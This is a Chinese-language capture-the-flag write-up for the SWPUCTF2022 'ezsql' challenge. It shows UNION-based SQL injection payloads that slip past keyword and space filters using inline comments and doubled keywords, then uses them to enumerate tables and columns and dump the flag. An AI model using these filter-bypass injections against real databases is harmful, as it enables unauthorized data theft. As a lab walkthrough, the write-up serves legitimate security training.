SWPUCTF2022-ezsql-wp

题目链接

页面内容

1
2
3
4

年轻的Web手啊！
看题目名就知道你该干嘛了吧~
用相对安全的方式传参吧
奥对了参数是nss

参数为nss， GET发送无效； POST nss=1发送成功 返回内容：

1
2

Flag: NSSCTF{This_1s_F4ke_flag}
This is true flag: NSSCTF{Ar3_y0u_K1ngd1ng}

注入

• 尝试联合注入

  1 2	> nss=-1' union select 1,2%23 < You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'select1,2#' LIMIT 0,1' at line 1

  从报错可以发现空格和union被消除

  尝试绕过 成功

  1 2 3 4 5 6 7 8

  > nss=-1'/**/ununionion/**/select/**/1,2,3%23 < Flag: NSSCTF{This_1s_F4ke_flag} This is true flag: NSSCTF{Ar3_y0u_K1ngd1ng} # 查看第二行内容 > nss=-1'/**/ununionion/**/select/**/1,2,3/**/limit/**/1,1%23 < Flag: 2 This is true flag: 3

• 接着常规流程注入

  注意or也会被屏蔽 所以information要更改为infoorrmation

  1 2 3 4 5 6 7 8 9 10 11 12 13 14

  > nss=-1'/**/ununionion/**/select/**/1,2,group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()/**/limit/**/1,1%23 < Flag: 2 This is true flag: NSS_tb,users > nss=-1'/**/ununionion/**/select/**/1,2,group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb'/**/limit/**/1,1%23 < Flag: 2 This is true flag: id,Secr3t,flll444g > nss=-1'/**/ununionion/**/select/**/id,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_db.NSS_tb/**/limit/**/1,1%23 < Flag: NSSCTF{b3c1613c-6acb-46f4-9510-f3184bd69eb5} This is true flag: NSSCTF{I_d0nt_want_t0_w4ke_up}